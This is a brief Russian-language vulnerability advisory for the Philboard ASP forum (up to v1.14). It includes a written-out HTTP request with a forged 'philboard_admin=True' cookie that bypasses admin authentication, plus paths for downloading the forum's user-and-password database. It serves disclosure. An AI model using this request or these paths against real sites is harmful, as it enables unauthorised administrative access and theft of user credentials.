Уязвимость обнаружена в бесплатном ASP форуме Philboard. Удаленный пользователь может получить административные привилегии на системе.
Сообщается, что удаленный пользователь может установить куки форума к
philboard_admin=True; или admin=True;, чтобы получить привилегии администратора на системе. Эксплоит:
1) Login Administrator Forum:
Use your telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;
2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
или
http://www.target.com/forum/database/philboard.mdb
Уязвимость обнаружена в Philboard up to v1.14.
